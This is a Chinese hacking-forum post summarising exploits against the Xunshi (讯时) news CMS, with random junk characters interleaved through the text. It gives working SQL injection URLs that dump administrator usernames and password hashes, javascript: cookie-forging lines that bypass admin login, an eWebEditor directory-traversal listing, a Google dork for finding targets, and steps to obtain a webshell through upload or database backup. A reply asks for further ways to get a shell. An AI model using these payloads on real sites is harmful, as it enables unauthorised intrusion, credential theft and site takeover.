找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2519|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘7 q9 S: v; g$ y7 S4 J2 K6 G3 |
. s, I2 ]4 _$ W$ i! `- \
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
2 ?8 D4 f" }% {7 b; \
; C# ^- G* A3 @以下本文总结来自黑防去年第9期杂志上的内容..." o6 i6 U$ p1 ]0 j. y( \% I
0 M8 G3 J- f4 N% d
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%9 S$ V  _& q( a7 g. n
  o5 n, C3 N  m
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 # e- O9 A9 S& [+ M0 d" P- Y: o5 d; O

- _# k5 C- b; z- F; l; Z: M记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
/ p; m5 n8 P1 l$ d, E这里一个注入. j( _, G+ K# D$ w6 q
6 v( p  s$ Z6 e) ~. K
效果如图:1 ?. Y2 K2 M4 L2 K

) f4 c2 I6 o6 V9 x, q( M
  d4 M" a9 G0 V4 J/ I: @% d2 K1 T4 a' {% O5 q& c) e/ C
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
: ~. w& Q8 S, q5 F" t: R
1 W# \- j0 x6 X, U% c# ]密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去, z) T" T# I6 r, W5 l
/ S9 h! I1 M/ l. c
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
/ u, E/ @8 D: q4 t" ~
2 |) L4 f( x) ^$ x( _那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
: _( o7 G/ k2 j7 u" o. c+ e- H, E. B
* @8 n4 `% s) e2 M因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞( @$ p3 |3 S& R9 n  a

$ ~7 `0 g  l* c它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以2 T) H0 n9 {; ?3 r5 u4 k1 [
0 ?; @4 z' B! t( C
访问这页面来列目录..步骤如下:; l9 p9 c& s) X- s! y$ V7 X

- R" u/ V; m( m% p0 z' [; I  pjavascript:alert(document.cookie="admindj=1") . x/ i6 H9 R3 q' F, ~" \) r) I

7 P; x0 I: j9 F: V8 F& S) {1 P, {! lhttp://www.political-security.co ... asp?id=46&dir=../..
5 F; e6 ~* d: M& f' r: ]8 y  I4 O
效果如图:$ O2 w( A8 L2 Q$ `' G$ ]

3 [8 L* a/ H/ q. Z" A  v6 z 2 l6 A, ?9 C# w4 X' R9 N: b$ [9 |4 N

7 j' p$ k5 y: I这样全站目录都能瞧了..找到后台目录..进去..
8 C7 f# _" O# D+ F# |! ]. I  k" _  w4 U8 S" ^6 }
那么进了后台怎么拿shell??上传--备份就ok了..
$ o4 R* _/ J( I
" K4 i& O/ G+ N$ X那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
( L9 F2 \3 U; G( v# A/ _
& N# O9 ~) o/ s) S: n这个我也碰到过一次..你都可以通过列目录来实现..# m+ F4 i+ O- U! g  J9 x% a; S
$ u* W8 [% r; V
javascript:alert(document.cookie="admindj=1")
0 F3 @% o/ X  }7 @4 p
% H& U# u. |& K; Z3 jhttp://www.political-security.co ... p?action=BackupData 8 A. s/ L2 g+ i* u7 `% V
! F5 r$ @5 Q5 }8 \( Z
备份ok..
3 p% T( \8 y$ ^6 v* V$ m5 P
* O) N5 m5 M( K' h4 z6 R" k: |" h那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?8 Y& G" Z! r, G- T* h& L
, O- W2 {& Q3 s  I
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下0 J5 F2 I: G) o3 D8 D9 z- {
4 X. d' Z# Z/ T
然后访问此页面进行注入..步骤如下:
1 i; T& U8 P, a9 b# j# }
" w# |% Z& ]: K4 d+ W* y1 gjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")  K; e, M' g# l! S# c% u6 _7 c
0 Y9 y) U3 N6 A/ i/ B6 r# N' x4 W
然后请求admin/admin_chk.asp页面
+ @* v3 {- y' q& D" E1 E4 J2 E- M% F. d2 [: T
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%* s2 k- G- z6 Y2 Y7 J

( c/ h" S! o" r26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin0 y( a  @) `+ `  s/ P" E

/ H. i: [3 u9 }: i+ \效果如图所示:
: e0 v' R' q( M  ~$ u, r2 @& Z. E, l% K% v  x+ Q
3 S  w' W4 x8 f5 K! ^
5 w- o( ~: {: n& k+ Y+ L
讯时漏洞2" Y9 b6 @; B' F) a8 z
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
: K0 [2 F  H4 d! o% R
' ]6 O# P4 G1 a* V, X1、/admin/admin_news_pl_view.asp?id=1
! N! ?! S5 y  g" Q, [& u6 L; M- |//id任意 填入以下语句2 e/ T2 I, M1 C0 L4 R3 W

* }5 |7 Q4 W2 f5 X% @& ~! u2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
! h. }0 E* ?& W2 t; W5 k # d$ ~8 \& u" ^% ?) r# X

8 I' z8 I# k/ m, u/ e$ i9 S) {* F0 U+ c) ^- x, S) f1 |
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
- @( k" K& l% M' t8 @
# \. \. m+ D7 v$ ?/ X3 H; G
# w( a0 o4 c% c- h. T+ s+ e+ F
$ o' B" `. O5 s  M6 \爆出管理员帐号和密码了
& {: E0 _: Q5 ^6 M) i & ]- h; s( S# p. ]/ I. E

; U0 H0 N- n: w# ]: _# d1 m, r* i4 w8 S* }# y! n6 h0 C3 k
4、cookies进后台6 I" |! [: k( o

% F9 G8 s1 i; Bjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));$ w; F* S; l; ?6 `( G

8 S/ Q6 `1 p+ L& T6 u* D; k/ M7 b9 l: H- L
8 f7 U( E+ n8 n7 _
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
& t/ \% z+ K, f+ Y9 \ 8 f8 q7 P- J+ v' g* \

1 Z9 A* |- S3 G9 F
" D( }2 I# `' m  @/ u6、后台有上传和备份取SHELL不难。9 o9 p% i( F: Z, |/ L$ t

& ?: D) N+ `" \+ Y1 ^: i1 @7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
9 O/ z3 f" [& ?: k" a+ f
; w, b6 W3 V" p) x  o7 C- o! n逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
/ e/ k/ J7 |' ]& z  O* z2 I5 W: F- r, f' T4 ]8 f$ o
/ V; [; a' v  F% }
7 l4 @$ D; U9 r7 `( t, o! X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表